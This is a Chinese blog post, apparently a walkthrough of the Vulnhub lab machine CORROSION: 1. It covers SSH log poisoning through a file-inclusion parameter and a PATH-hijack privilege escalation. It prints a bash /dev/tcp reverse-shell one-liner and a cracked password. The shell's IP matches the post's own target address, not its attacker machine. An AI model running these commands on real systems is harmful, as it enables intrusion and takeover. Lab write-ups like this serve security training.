Vulnhub 靶场 CORROSION: 1

Vulnhub 靶场 CORROSION: 1

前期准备:

靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/
kali攻击机ip:192.168.147.211
靶机ip:192.168.147.190

一、信息收集

1、nmap进行扫描。
image
发现开放了22和80端口。
2、访问80端口。
image
源代码中也没有什么提示,扫一下目录:
image
挨个访问一下:
/tasks
image
image
提示需要完成任务,修改log日志。
/blog-post
image
randy 大概是个用户名。很具前面目录扫描的结果判断,/blog-post 目录后还有东西,再扫一下:
image
访问/archives
image

二、漏洞利用

查看一下 randylogs.php 文件:
image
发现空白什么都没有,用FUZZ进行模糊测试。
image
得到了file参数。
可以访问系统文件,访问之前提到的auth.log日志。
image

发现会记录 ssh 登录的所有活动,那我们可以尝试添加恶意 PHP 代码作为用户名,该代码将从用户输入并执行命令。这通常称为日志中毒。
image
再次查看日志信息:
image
发现没问题,写入shell

bash -c 'bash -i >& /dev/tcp/192.168.147.190/1234 0>&1'

url编码一下。

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.190%2F1234%200%3E%261%27

访问并监听:
image
攻击机监听
image
之前我们访问 /etc/passwd 文件时,发现有个用户 randy,大概下一步是要提权到 rangdy。

三、提权

查看了一下系统内的文件
image
发现user_backuo.zip比较可疑,解压缩发现需要密码,传送到本机进行破解。
image
爆破一下压缩包。
image
pw == !randybaby
解压缩查看
image
image
image
发现了 /home/randy/tools/easysysinfo ,查看一下:
image
查看权限发现并不能改,那就用之前的方法,本地编辑 cat 文件,写入 shell

echo 'chmod +s /bin/bash' > cat
chmod 777 cat
export PATH=/home/randy/tools:$PATH
./easysysinfo
/bin/bash -p

image
提权成功。
image

posted on 2022-06-29 15:47  水果味儿  阅读(131)  评论(0编辑  收藏  举报